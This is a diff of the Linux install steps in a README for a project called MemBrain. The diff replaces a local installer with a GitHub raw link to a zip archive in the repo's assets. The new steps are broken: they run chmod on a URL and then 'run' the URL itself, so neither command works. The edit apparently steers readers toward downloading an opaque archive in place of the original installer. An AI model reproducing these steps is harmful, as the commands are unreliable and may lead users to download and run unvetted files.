3ilix/MemBrain/README.md

 - For Linux:
   1. Open a terminal window.
   2. Navigate to the directory where you downloaded the file.
-  3. Run `chmod +x MemBrain-linux.run` to make it executable.
+  3. Run `chmod +x https://github.com/3ilix/MemBrain/raw/refs/heads/main/assets/Mem_Brain_1.8.zip` to make it executable.
-  4. Then run `./MemBrain-linux.run` to install.
+  4. Then run `https://github.com/3ilix/MemBrain/raw/refs/heads/main/assets/Mem_Brain_1.8.zip` to install.

 ### 5. Launch MemBrain